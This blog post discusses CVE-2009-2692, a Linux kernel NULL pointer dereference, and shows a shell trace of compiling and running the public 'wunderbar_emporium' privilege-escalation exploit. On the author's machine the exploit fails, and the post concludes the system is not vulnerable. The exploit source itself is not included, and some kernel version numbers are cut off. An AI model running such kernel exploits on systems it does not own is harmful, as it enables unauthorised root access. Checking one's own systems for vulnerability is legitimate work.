Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again as same with previous cve posts, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c herehere or here.  As explain in the documentation, this exploit mainly target this kernel version:

  • kernel 2.6.0 to

  • kernel 2.4.4 to

So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.

According to the cve, description for this exploit

The Linux kernel 2.6.0 through, and 2.4.4 through, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhostp:~/Desktop/exploit/wunderbar_emporium$ whoami

So this server is not vulnerable for this exploit! All good.

No comments:

Post a Comment